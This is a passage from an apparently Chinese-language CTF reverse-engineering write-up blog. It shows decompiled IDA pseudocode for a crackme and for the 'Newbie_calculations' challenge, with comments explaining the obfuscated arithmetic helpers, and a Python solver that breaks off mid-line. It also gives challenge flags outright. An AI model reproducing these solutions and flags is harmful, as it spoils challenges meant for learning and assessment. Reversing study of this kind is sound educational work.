v10=转换的数字+<span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> ( v10_108 == <span class="number">123</span> && v11_101 == <span class="string">'x'</span> && v13_FF == <span class="string">'z'</span> && v12_100 == <span class="string">'y'</span> )// 输入atoi转整形得到结果+<span class="number">1</span>等于<span class="number">123</span>,则输入开始的数字部分为<span class="number">122</span></span><br><span class="line"> // 输入的后<span class="number">3</span>位为xyz</span><br><span class="line"> {</span><br><span class="line"> strcpy(Text, <span class="string">"flag"</span>); // 下面开始拼接flag</span><br><span class="line"> memset(&v7, <span class="number">0</span>, <span class="number">0xFC</span>u);</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> _itoa(v10_108, &v5, <span class="number">10</span>);</span><br><span class="line"> strcat(Text, <span class="string">"{"</span>);</span><br><span class="line"> strcat(Text, &v5);</span><br><span class="line"> strcat(Text, <span class="string">"_"</span>);</span><br><span class="line"> strcat(Text, <span class="string">"Buff3r_0v3rf|0w"</span>);</span><br><span class="line"> strcat(Text, <span class="string">"}"</span>);</span><br><span class="line"> MessageBoxA(<span class="number">0</span>, Text, <span class="string">"well done"</span>, <span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> SetTimer(hWnd, <span class="number">1</span>u, <span class="number">0x3E8</span>u, TimerFunc);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( a3 == <span class="number">1001</span> )</span><br><span class="line"> KillTimer(hWnd, <span class="number">1</span>u);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/r4SjUdbCuf3lNYL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/b4DwoQcrNOszVFj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p> <strong><em>flag{123_Buff3r_0v3rf|0w}</em></strong></p><h3 id="Newbie-calculations"><a href="#Newbie-calculations" class="headerlink" title="Newbie_calculations"></a>Newbie_calculations</h3><p>题目名百度翻译成新手计算,那我猜应该是个实现计算器的题目。。。。</p><p>IDA打开程序,发现一长串的函数反复调用,而且程序没有输入,只有输出。额,那这样的话程序运行就应该输出flag,但程序中肯定会有垃圾循环操作,就让你跑不出来。</p><p>这种题目就要分析函数作用,简化,自己实现算法。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i < <span class="number">32</span>; ++i )</span><br><span class="line"> flag[i] = <span class="number">1</span>;</span><br><span class="line"> v121 = <span class="number">0</span>;</span><br><span class="line"> puts(<span class="string">"Your flag is:"</span>);</span><br><span class="line"> v3 = mul_401100(flag, <span class="number">0x3B9ACA00</span>);</span><br><span class="line"> v4 = sub_401220(v3, <span class="number">0x3B9AC9CE</span>);</span><br><span class="line"> mul_401100(v4, <span class="number">2</span>);</span><br><span class="line"> v5 = add_401000(&flag[<span class="number">1</span>], <span class="number">0x4C4B40</span>);</span><br><span class="line"> v6 = sub_401220(v5, <span class="number">0x65B9AA</span>);</span><br><span class="line"> v7 = add_401000(v6, <span class="number">1666666</span>);</span><br><span class="line"> v8 = add_401000(v7, <span class="number">45</span>);</span><br><span class="line"> v9 = mul_401100(v8, <span class="number">2</span>);</span><br><span class="line"> add_401000(v9, <span class="number">5</span>);</span><br><span class="line"> v10 = mul_401100(&flag[<span class="number">2</span>], <span class="number">0x3B9ACA00</span>);</span><br><span class="line"> v11 = sub_401220(v10, <span class="number">999999950</span>);</span><br><span class="line"> v12 = mul_401100(v11, <span class="number">2</span>);</span><br><span class="line"> add_401000(v12, <span class="number">2</span>);</span><br><span class="line"> v13 = add_401000(&flag[<span class="number">3</span>], <span class="number">55</span>);</span><br><span class="line"> v14 = sub_401220(v13, <span class="number">3</span>);</span><br><span class="line"> v15 = add_401000(v14, <span class="number">4</span>);</span><br><span class="line"> sub_401220(v15, <span class="number">1</span>);</span><br><span class="line"> v16 = mul_401100(&flag[<span class="number">4</span>], <span class="number">100000000</span>);</span><br><span class="line"> v17 = sub_401220(v16, <span class="number">99999950</span>);</span><br><span class="line"> v18 = mul_401100(v17, <span class="number">2</span>);</span><br><span class="line"> add_401000(v18, <span class="number">2</span>);</span><br><span class="line"> v19 = sub_401220(&flag[<span class="number">5</span>], <span class="number">1</span>);</span><br><span class="line"> v20 = mul_401100(v19, <span class="number">1000000000</span>);</span><br><span class="line"> v21 = add_401000(v20, <span class="number">55</span>);</span><br><span class="line"> sub_401220(v21, <span class="number">3</span>);</span><br><span class="line"> v22 = mul_401100(&flag[<span class="number">6</span>], <span class="number">1000000</span>);</span><br><span class="line"> v23 = sub_401220(v22, <span class="number">999975</span>);</span><br><span class="line"> mul_401100(v23, <span class="number">4</span>);</span><br><span class="line"> v24 = add_401000(&flag[<span class="number">7</span>], <span class="number">55</span>);</span><br><span class="line"> v25 = sub_401220(v24, <span class="number">33</span>);</span><br><span class="line"> v26 = add_401000(v25, <span class="number">44</span>);</span><br><span class="line"> sub_401220(v26, <span class="number">11</span>);</span><br><span class="line"> v27 = mul_401100(&flag[<span class="number">8</span>], <span class="number">10</span>);</span><br><span class="line"> v28 = sub_401220(v27, <span class="number">5</span>);</span><br><span class="line"> v29 = mul_401100(v28, <span class="number">8</span>);</span><br><span class="line"> add_401000(v29, <span class="number">9</span>);</span><br><span class="line"> v30 = add_401000(&flag[<span class="number">9</span>], <span class="number">0</span>);</span><br><span class="line"> v31 = sub_401220(v30, <span class="number">0</span>);</span><br><span class="line"> v32 = add_401000(v31, <span class="number">11</span>);</span><br><span class="line"> v33 = sub_401220(v32, <span class="number">11</span>);</span><br><span class="line"> add_401000(v33, <span class="number">53</span>);</span><br><span class="line"> v34 = add_401000(&flag[<span class="number">10</span>], <span class="number">49</span>);</span><br><span class="line"> v35 = sub_401220(v34, <span class="number">2</span>);</span><br><span class="line"> v36 = add_401000(v35, <span class="number">4</span>);</span><br><span class="line"> sub_401220(v36, <span class="number">2</span>);</span><br><span class="line"> v37 = mul_401100(&flag[<span class="number">11</span>], <span class="number">1000000</span>);</span><br><span class="line"> v38 = sub_401220(v37, <span class="number">999999</span>);</span><br><span class="line"> v39 = mul_401100(v38, <span class="number">4</span>);</span><br><span class="line"> add_401000(v39, <span class="number">50</span>);</span><br><span class="line"> v40 = add_401000(&flag[<span class="number">12</span>], <span class="number">1</span>);</span><br><span class="line"> v41 = add_401000(v40, <span class="number">1</span>);</span><br><span class="line"> v42 = add_401000(v41, <span class="number">1</span>);</span><br><span class="line"> v43 = add_401000(v42, <span class="number">1</span>);</span><br><span class="line"> v44 = add_401000(v43, <span class="number">1</span>);</span><br><span class="line"> v45 = add_401000(v44, <span class="number">1</span>);</span><br><span class="line"> v46 = add_401000(v45, <span class="number">10</span>);</span><br><span class="line"> add_401000(v46, <span class="number">32</span>);</span><br><span class="line"> v47 = mul_401100(&flag[<span class="number">13</span>], <span class="number">10</span>);</span><br><span class="line"> v48 = sub_401220(v47, <span class="number">5</span>);</span><br><span class="line"> v49 = mul_401100(v48, <span class="number">8</span>);</span><br><span class="line"> v50 = add_401000(v49, <span class="number">9</span>);</span><br><span class="line"> add_401000(v50, <span class="number">48</span>);</span><br><span class="line"> v51 = sub_401220(&flag[<span class="number">14</span>], <span class="number">1</span>);</span><br><span class="line"> v52 = mul_401100(v51, <span class="number">-294967296</span>);</span><br><span class="line"> v53 = add_401000(v52, <span class="number">55</span>);</span><br><span class="line"> sub_401220(v53, <span class="number">3</span>);</span><br><span class="line"> v54 = add_401000(&flag[<span class="number">15</span>], <span class="number">1</span>);</span><br><span class="line"> v55 = add_401000(v54, <span class="number">2</span>);</span><br><span class="line"> v56 = add_401000(v55, <span class="number">3</span>);</span><br><span class="line"> v57 = add_401000(v56, <span class="number">4</span>);</span><br><span class="line"> v58 = add_401000(v57, <span class="number">5</span>);</span><br><span class="line"> v59 = add_401000(v58, <span class="number">6</span>);</span><br><span class="line"> v60 = add_401000(v59, <span class="number">7</span>);</span><br><span class="line"> add_401000(v60, <span class="number">20</span>);</span><br><span class="line"> v61 = mul_401100(&flag[<span class="number">16</span>], <span class="number">10</span>);</span><br><span class="line"> v62 = sub_401220(v61, <span class="number">5</span>);</span><br><span class="line"> v63 = mul_401100(v62, <span class="number">8</span>);</span><br><span class="line"> v64 = add_401000(v63, <span class="number">9</span>);</span><br><span class="line"> add_401000(v64, <span class="number">48</span>);</span><br><span class="line"> v65 = add_401000(&flag[<span class="number">17</span>], <span class="number">7</span>);</span><br><span class="line"> v66 = add_401000(v65, <span class="number">6</span>);</span><br><span class="line"> v67 = add_401000(v66, <span class="number">5</span>);</span><br><span class="line"> v68 = add_401000(v67, <span class="number">4</span>);</span><br><span class="line"> v69 = add_401000(v68, <span class="number">3</span>);</span><br><span class="line"> v70 = add_401000(v69, <span class="number">2</span>);</span><br><span class="line"> v71 = add_401000(v70, <span class="number">1</span>);</span><br><span class="line"> add_401000(v71, <span class="number">20</span>);</span><br><span class="line"> v72 = add_401000(&flag[<span class="number">18</span>], <span class="number">7</span>);</span><br><span class="line"> v73 = add_401000(v72, <span class="number">2</span>);</span><br><span class="line"> v74 = add_401000(v73, <span class="number">4</span>);</span><br><span class="line"> v75 = add_401000(v74, <span class="number">3</span>);</span><br><span class="line"> v76 = add_401000(v75, <span class="number">6</span>);</span><br><span class="line"> v77 = add_401000(v76, <span class="number">5</span>);</span><br><span class="line"> v78 = add_401000(v77, <span class="number">1</span>);</span><br><span class="line"> add_401000(v78, <span class="number">20</span>);</span><br><span class="line"> v79 = mul_401100(&flag[<span class="number">19</span>], <span class="number">1000000</span>);</span><br><span class="line"> v80 = sub_401220(v79, <span class="number">999999</span>);</span><br><span class="line"> v81 = mul_401100(v80, <span class="number">4</span>);</span><br><span class="line"> v82 = add_401000(v81, <span class="number">50</span>);</span><br><span class="line"> sub_401220(v82, <span class="number">1</span>);</span><br><span class="line"> v83 = sub_401220(&flag[<span class="number">20</span>], <span class="number">1</span>);</span><br><span class="line"> v84 = mul_401100(v83, <span class="number">-294967296</span>);</span><br><span class="line"> v85 = add_401000(v84, <span class="number">49</span>);</span><br><span class="line"> sub_401220(v85, <span class="number">1</span>);</span><br><span class="line"> v86 = sub_401220(&flag[<span class="number">21</span>], <span class="number">1</span>);</span><br><span class="line"> v87 = mul_401100(v86, <span class="number">1000000000</span>);</span><br><span class="line"> v88 = add_401000(v87, <span class="number">54</span>);</span><br><span class="line"> v89 = sub_401220(v88, <span class="number">1</span>);</span><br><span class="line"> v90 = add_401000(v89, <span class="number">1000000000</span>);</span><br><span class="line"> sub_401220(v90, <span class="number">1000000000</span>);</span><br><span class="line"> v91 = add_401000(&flag[<span class="number">22</span>], <span class="number">49</span>);</span><br><span class="line"> v92 = sub_401220(v91, <span class="number">1</span>);</span><br><span class="line"> v93 = add_401000(v92, <span class="number">2</span>);</span><br><span class="line"> sub_401220(v93, <span class="number">1</span>);</span><br><span class="line"> v94 = mul_401100(&flag[<span class="number">23</span>], <span class="number">10</span>);</span><br><span class="line"> v95 = sub_401220(v94, <span class="number">5</span>);</span><br><span class="line"> v96 = mul_401100(v95, <span class="number">8</span>);</span><br><span class="line"> v97 = add_401000(v96, <span class="number">9</span>);</span><br><span class="line"> add_401000(v97, <span class="number">48</span>);</span><br><span class="line"> v98 = add_401000(&flag[<span class="number">24</span>], <span class="number">1</span>);</span><br><span class="line"> v99 = add_401000(v98, <span class="number">3</span>);</span><br><span class="line"> v100 = add_401000(v99, <span class="number">3</span>);</span><br><span class="line"> v101 = add_401000(v100, <span class="number">3</span>);</span><br><span class="line"> v102 = add_401000(v101, <span class="number">6</span>);</span><br><span class="line"> v103 = add_401000(v102, <span class="number">6</span>);</span><br><span class="line"> v104 = add_401000(v103, <span class="number">6</span>);</span><br><span class="line"> add_401000(v104, <span class="number">20</span>);</span><br><span class="line"> v105 = add_401000(&flag[<span class="number">25</span>], <span class="number">55</span>);</span><br><span class="line"> v106 = sub_401220(v105, <span class="number">33</span>);</span><br><span class="line"> v107 = add_401000(v106, <span class="number">44</span>);</span><br><span class="line"> v108 = sub_401220(v107, <span class="number">11</span>);</span><br><span class="line"> add_401000(v108, <span class="number">42</span>);</span><br><span class="line"> add_401000(&flag[<span class="number">26</span>], flag[<span class="number">25</span>]);</span><br><span class="line"> add_401000(&flag[<span class="number">27</span>], flag[<span class="number">12</span>]);</span><br><span class="line"> v109 = flag[<span class="number">27</span>];</span><br><span class="line"> v110 = sub_401220(&flag[<span class="number">28</span>], <span class="number">1</span>);</span><br><span class="line"> v111 = add_401000(v110, v109);</span><br><span class="line"> sub_401220(v111, <span class="number">1</span>);</span><br><span class="line"> v112 = flag[<span class="number">23</span>];</span><br><span class="line"> v113 = sub_401220(&flag[<span class="number">29</span>], <span class="number">1</span>);</span><br><span class="line"> v114 = mul_401100(v113, <span class="number">1000000</span>);</span><br><span class="line"> add_401000(v114, v112);</span><br><span class="line"> v115 = flag[<span class="number">27</span>];</span><br><span class="line"> v116 = add_401000(&flag[<span class="number">30</span>], <span class="number">1</span>);</span><br><span class="line"> mul_401100(v116, v115);</span><br><span class="line"> add_401000(&flag[<span class="number">31</span>], flag[<span class="number">30</span>]);</span><br><span class="line"> print_401C7F(<span class="string">"CTF{"</span>);</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j < <span class="number">32</span>; ++j )</span><br><span class="line"> print_401C7F(<span class="string">"%c"</span>, SLOBYTE(flag[j]));</span><br><span class="line"> print_401C7F(<span class="string">"}\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>这道题目的关键就在于如何识别出上面这些函数的作用</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">_DWORD *__cdecl mul_401100(_DWORD *a1, int a2)</span><br><span class="line">{</span><br><span class="line"> int v2; // ST20_4</span><br><span class="line"> signed int v4; // [esp+Ch] [ebp<span class="number">-1</span>Ch]</span><br><span class="line"> int v5; // [esp+<span class="number">14</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"> int v6; // [esp+<span class="number">18</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"> int v7; // [esp+<span class="number">1</span>Ch] [ebp-Ch]</span><br><span class="line"> int v8; // [esp+<span class="number">20</span>h] [ebp<span class="number">-8</span>h]</span><br><span class="line"></span><br><span class="line"> v5 = *a1;</span><br><span class="line"> v6 = a2;</span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v7 = a2 * v5;</span><br><span class="line"> <span class="keyword">while</span> ( a2 ) // a1累加a2次 相当于a1*a2</span><br><span class="line"> {</span><br><span class="line"> v2 = v7 * v5;</span><br><span class="line"> add_401000(&v8, *a1);</span><br><span class="line"> ++v7;</span><br><span class="line"> --a2;</span><br><span class="line"> v6 = v2 - <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">while</span> ( v4 ) // 循环结束a1=a1<span class="number">-1</span></span><br><span class="line"> {</span><br><span class="line"> ++v7;</span><br><span class="line"> ++*a1;</span><br><span class="line"> --v4;</span><br><span class="line"> --v6;</span><br><span class="line"> }</span><br><span class="line"> ++*a1;</span><br><span class="line"> *a1 = v8;</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="number">1</span> int *__cdecl add_401000(int *a1, int a2)</span><br><span class="line"> <span class="number">2</span> {</span><br><span class="line"> <span class="number">3</span> int v2; // edx</span><br><span class="line"> <span class="number">4</span> int v4; // [esp+Ch] [ebp<span class="number">-18</span>h]</span><br><span class="line"> <span class="number">5</span> int v5; // [esp+<span class="number">10</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"> <span class="number">6</span> int v6; // [esp+<span class="number">18</span>h] [ebp-Ch]</span><br><span class="line"> <span class="number">7</span> signed int v7; // [esp+<span class="number">1</span>Ch] [ebp<span class="number">-8</span>h]</span><br><span class="line"> <span class="number">8</span> </span><br><span class="line"> <span class="number">9</span> v5 = <span class="number">-1</span>;</span><br><span class="line"><span class="number">10</span> v4 = <span class="number">-1</span> - a2 + <span class="number">1</span>;</span><br><span class="line"><span class="number">11</span> v7 = <span class="number">1231</span>;</span><br><span class="line"><span class="number">12</span> v2 = *a1;</span><br><span class="line"><span class="number">13</span> v6 = a2 + <span class="number">1231</span>;</span><br><span class="line"><span class="number">14</span> <span class="keyword">while</span> ( v4 ) <span class="number">15</span> // 循环结束 a1=a1+a2</span><br><span class="line"><span class="number">16</span> {</span><br><span class="line"><span class="number">17</span> ++v7;</span><br><span class="line"><span class="number">18</span> --*a1; //循环- 相当于-(-a2) +a2</span><br><span class="line"><span class="number">19</span> --v4;</span><br><span class="line"><span class="number">20</span> --v6;</span><br><span class="line"><span class="number">21</span> }</span><br><span class="line"><span class="number">22</span> <span class="keyword">while</span> ( v5 )</span><br><span class="line"><span class="number">23</span> {</span><br><span class="line"><span class="number">24</span> --v6;</span><br><span class="line"><span class="number">25</span> ++*a1;</span><br><span class="line"><span class="number">26</span> --v5;</span><br><span class="line"><span class="number">27</span> }</span><br><span class="line"><span class="number">28</span> ++*a1; // a1在上面的循环中<span class="number">-1</span>,现在+<span class="number">1</span>,还是原值</span><br><span class="line"><span class="number">29</span> <span class="keyword">return</span> a1;</span><br><span class="line"><span class="number">30</span> }</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">_DWORD *__cdecl sub_401220(_DWORD *a1, int a2)</span><br><span class="line">{</span><br><span class="line"> int v3; // [esp+<span class="number">8</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"> signed int v4; // [esp+Ch] [ebp-Ch]</span><br><span class="line"> signed int v5; // [esp+<span class="number">14</span>h] [ebp<span class="number">-4</span>h]</span><br><span class="line"> int v6; // [esp+<span class="number">14</span>h] [ebp<span class="number">-4</span>h]</span><br><span class="line"></span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> v3 = <span class="number">-1</span> - a2 + <span class="number">1</span>;</span><br><span class="line"> v5 = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">while</span> ( v3 ) // -a2</span><br><span class="line"> {</span><br><span class="line"> ++*a1; // 循环结束,相当于 a1=a1-a2</span><br><span class="line"> --v3;</span><br><span class="line"> --v5;</span><br><span class="line"> }</span><br><span class="line"> v6 = v5 * v5;</span><br><span class="line"> <span class="keyword">while</span> ( v4 ) // 这个循环后 a1=a1<span class="number">-1</span></span><br><span class="line"> {</span><br><span class="line"> v6 *= <span class="number">123</span>;</span><br><span class="line"> ++*a1;</span><br><span class="line"> --v4;</span><br><span class="line"> }</span><br><span class="line"> ++*a1; // a1+=<span class="number">1</span>,恢复上一个循环前的值</span><br><span class="line"> <span class="keyword">return</span> a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>WP</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mul_401100</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a*b</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sub_401220</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a-b</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_401000</span><span class="params">(a,b)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> a+b</span><br><span class="line">flag=[<span class="number">1</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>)]</span><br><span class="line">v121 = <span class="number">0</span></span><br><span class="line">print(<span class="string">"Your flag is:"</span>)</span><br><span class="line">v3 = mul_401100(flag[<span class="number">0</span>], <span class="number">0x3B9ACA00</span>)</span><br><span class="line">v4 = sub_401220(v3, <span class="number">0x3B9AC9CE</span>)</span><br><span class="line">flag[<span class="number">0</span>]=mul_401100(v4, <span class="number">2</span>)</span><br><span class="line">v5 = add_401000(flag[<span class="number">1</span>], <span class="number">0x4C4B40</span>)</span><br><span class="line">v6 = sub_401220(v5, <span class="number">0x65B9AA</span>)</span><br><span class="line">v7 = add_401000(v6, <span class="number">1666666</span>)</span><br><span class="line">v8 = add_401000(v7, <span class="number">45</span>)</span><br><span class="line">v9 = mul_401100(v8, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">1</span>]=add_401000(v9, <span class="number">5</span>)</span><br><span class="line">v10 = mul_401100(flag[<span class="number">2</span>], <span class="number">0x3B9ACA00</span>)</span><br><span class="line">v11 = sub_401220(v10, <span class="number">999999950</span>)</span><br><span class="line">v12 = mul_401100(v11, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">2</span>]=add_401000(v12, <span class="number">2</span>)</span><br><span class="line">v13 = add_401000(flag[<span class="number">3</span>], <span class="number">55</span>)</span><br><span class="line">v14 = sub_401220(v13, <span class="number">3</span>)</span><br><span class="line">v15 = add_401000(v14, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">3</span>]=sub_401220(v15, <span class="number">1</span>)</span><br><span class="line">v16 = mul_401100(flag[<span class="number">4</span>], <span class="number">100000000</span>)</span><br><span class="line">v17 = sub_401220(v16, <span class="number">99999950</span>)</span><br><span class="line">v18 = mul_401100(v17, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">4</span>]=add_401000(v18, <span class="number">2</span>)</span><br><span class="line">v19 = sub_401220(flag[<span class="number">5</span>], <span class="number">1</span>)</span><br><span class="line">v20 = mul_401100(v19, <span class="number">1000000000</span>)</span><br><span class="line">v21 = add_401000(v20, <span class="number">55</span>)</span><br><span class="line">flag[<span class="number">5</span>]=sub_401220(v21, <span class="number">3</span>)</span><br><span class="line">v22 = mul_401100(flag[<span class="number">6</span>], <span class="number">1000000</span>)</span><br><span class="line">v23 = sub_401220(v22, <span class="number">999975</span>)</span><br><span class="line">flag[<span class="number">6</span>]=mul_401100(v23, <span class="number">4</span>)</span><br><span class="line">v24 = add_401000(flag[<span class="number">7</span>], <span class="number">55</span>)</span><br><span class="line">v25 = sub_401220(v24, <span class="number">33</span>)</span><br><span class="line">v26 = add_401000(v25, <span class="number">44</span>)</span><br><span class="line">flag[<span class="number">7</span>]=sub_401220(v26, <span class="number">11</span>)</span><br><span class="line">v27 = mul_401100(flag[<span class="number">8</span>], <span class="number">10</span>)</span><br><span class="line">v28 = sub_401220(v27, <span class="number">5</span>)</span><br><span class="line">v29 = mul_401100(v28, <span class="number">8</span>)</span><br><span class="line">flag[<span class="number">8</span>]=add_401000(v29, <span class="number">9</span>)</span><br><span class="line">v30 = add_401000(flag[<span class="number">9</span>], <span class="number">0</span>)</span><br><span class="line">v31 = sub_401220(v30, <span class="number">0</span>)</span><br><span class="line">v32 = add_401000(v31, <span class="number">11</span>)</span><br><span class="line">v33 = sub_401220(v32, <span class="number">11</span>)</span><br><span class="line">flag[<span class="number">9</span>]=add_401000(v33, <span class="number">53</span>)</span><br><span class="line">v34 = add_401000(flag[<span class="number">10</span>], <span class="number">49</span>)</span><br><span class="line">v35 = sub_401220(v34, <span class="number">2</span>)</span><br><span class="line">v36 = add_401000(v35, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">10</span>]=sub_401220(v36, <span class="number">2</span>)</span><br><span class="line">v37 = mul_401100(flag[<span class="number">11</span>], <span class="number">1000000</span>)</span><br><span class="line">v38 = sub_401220(v37, <span class="number">999999</span>)</span><br><span class="line">v39 = mul_401100(v38, <span class="number">4</span>)</span><br><span class="line">flag[<span class="number">11</span>]=add_401000(v39, <span class="number">50</span>)</span><br><span class="line">v40 = add_401000(flag[<span class="number">12</span>], <span class="number">1</span>)</span><br><span class="line">v41 = add_401000(v40, <span class="number">1</span>)</span><br><span class="line">v42 = add_401000(v41, <span class="number">1</span>)</span><br><span class="line">v43 = add_401000(v42, <span class="number">1</span>)</span><br><span class="line">v44 = add_401000(v43, <span class="number">1</span>)</span><br><span class="line">v45 = add_401000(v44, <span class="number">1</span>)</span><br><span class="line">v46 = add_401000(v45, <span class="number">10</span>)</span><br><span class="line">flag[<span class="number">12</span>]=add_401000(v46, <span class="number">32</span>)</span><br><span class="line">v47 = mul_401100(flag[<span class="number">13</span>], <span class="number">10</span>)</span><br><span class="line">v48 = sub_401220(v47, <span class="number">5</span>)</span><br><span class="line">v49 = mul_401100(v48, <span class="number">8</span>)</span><br><span class="line">v50 = add_401000(v49, <span class="number">9</span>)</span><br><span class="line">flag[<span class="number">13</span>]=add_401000(v50, <span class="number">48</span>)</span><br><span class="line">v51 = sub_401220(flag[<span class="number">14</span>], <span class="number">1</span>)</span><br><span class="line">v52 = mul_401100(v51, <span class="number">-294967296</span>)</span><br><span class="line">v53 = add_401000(v52, <span class="number">55</span>)</span><br><span class="line">flag[<span class="number">14</span>]=sub_401220(v53, <span class="number">3</span>)</span><br><span class="line">v54 = add_401000(flag[<span class="number">15</span>], <span class="number">1</span>)</span><br><span class="line">v55 = add_401000(v54, <span class="number">2</span>)</span><br><span class="line">v56 = add_401000(v55, <span class="number">3</span>)</span><br><span class="line">v57 = add_401000(v56, <span class="number">4</span>)</span><br><span class="line">v58 = add_401000(v57, <span class="number">5</span>)</span><br><span class="line">v59 = add_401000(v58, <span class="number">6</span>)</span><br><span class="line">v60 = add_401000(v59, <span class="number">7</span>)</span><br><span class="line">flag[<span class="number">15</span>]=add_401000(v60, <span class="number">20</span>)</span><br><span class="line">v61 = mul_401100(flag[<span class="number">16</span>], <span class="number">10</span>)</span><br><span class="line">v62 = sub_401220(v61, <span class="number">5</span>)</span><br><span class="line">v63 = mul_401100(v62, <span class="number">8</span>)</span><br><span class="line">v64 = add_401000(v63, <span class="number">9</span>)</span><br><span class="line">flag[<span class="number">16</span>]=add_401000(v64, <span class="number">48</span>)</span><br><span class="line">v65 = add_401000(flag[<span class="number">17</span>], <span class="number">7</span>)</span><br><span class="line">v66 = add_401000(v65, <span class="number">6</span>)</span><br><span class="line">v67 = add_401000(v66, <span class="number">5</span>)</span><br><span class="line">v68 = add_401000(v67, <span class="number">4</span>)</span><br><span class="line">v69 = add_401000(v68, <span class="number">3</span>)</span><br><span class="line">v70 = add_401000(v69, <span class="number">2</span>)</span><br><span class="line">v71 = add_401000(v70, <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">17</span>]=add_401000(v71, <span class="number">20</span>)</span><br><span class="line">v72 = add_401000(flag[<span class="number">18</span>], <span class="number">7</span>)</span><br><span class="line">v73 = add_401000(v72, <span class="number">2</span>)</span><br><span class="line">v74 = add_401000(v73, <span class="number">4</span>)</span><br><span class="line">v75 = add_401000(v74, <span class="number">3</span>)</span><br><span class="line">v76 = add_401000(v75, <span class="number">6</span>)</span><br><span class="line">v77 = add_401000(v76, <span class="number">5</span>)</span><br><span class="line">v78 = add_401000(v77, <span class="number">1</span>)</span><br><span class="line">flag[<span class="number">18</span>]=add_401000(v78, <span class="number">20</span>)</span><br><span class="line">v79 = mul_401100(flag[<span class="number">19</span>], <span class="number">1000000</span>)</span><br><span class="line">v80 = sub_401220(v79, <span class="number">999999</span>)</span><br><span class="line">v81 = mul_401100(v80, <span class="number">4</span>)</span><br><span class="line">v82 = add_401000(v81, <span class="number">50</span>)</span><br><span class="line">flag[<span class="number">19</span>]=sub_401220(v82, <span class="number">1</span>)</span><br><span class="line">v83 = sub_401220(flag[<span class="number">20</span>], <span class="number">1</span>)</span><br><span class="line">v84 = mul_401100(v83, <span class="number">-294967296</span>)</span><br><span class="line">v85 = add_401000(v84, <span class="number">49</span>)</span><br><span class="line">flag[<span class="number">20</span>]=sub_401220(v85, <span class="number">1</span>)</span><br><span class="line">v86 = sub_401220(flag[<span class="number">21</span>], <span class="number">1</span>)</span><br><span class="line">v87 = mul_401100(v86, <span class="number">1000000000</span>)</span><br><span class="line">v88 = add_401000(v87, <span class="number">54</span>)</span><br><span class="line">v89 = sub_401220(v88, <span class="number">1</span>)</span><br><span class="line">v90 = add_401000(v89, <span class="number">1000000000</span>)</span><br><span class="line">flag[<span class="number">21</span>]=sub_401220(v90, <span class="number">1000000000</span>)</span><br><span class="line">v91 = add_401000(flag[<span class="number">22</span>], <span class="number">49</span>)</span><br><span class="line">v92 = sub_401220(v91, <span class="number">1</span>)</span><br><span class="line">v93 = add_401000(v92, <span class="number">2</span>)</span><br><span class="line">flag[<span class="number">22</span>]=sub_401220(v93, <span class="number">1</span>)</span><br><span class="line">v94 = mul_401100(flag[<span class="number">23</span>], <span class="number">10</span>)</span><br><span class="line">v95 = sub_401220(v94, <span class="number">5</span>)</span><br><span class="line">v96 = mul_401100(v95, <span class="number">8</span>)</span><br><span class="line">v97 = add_401000(v96, <span class="number">9</span>)</span><br><span class="line">flag[<span 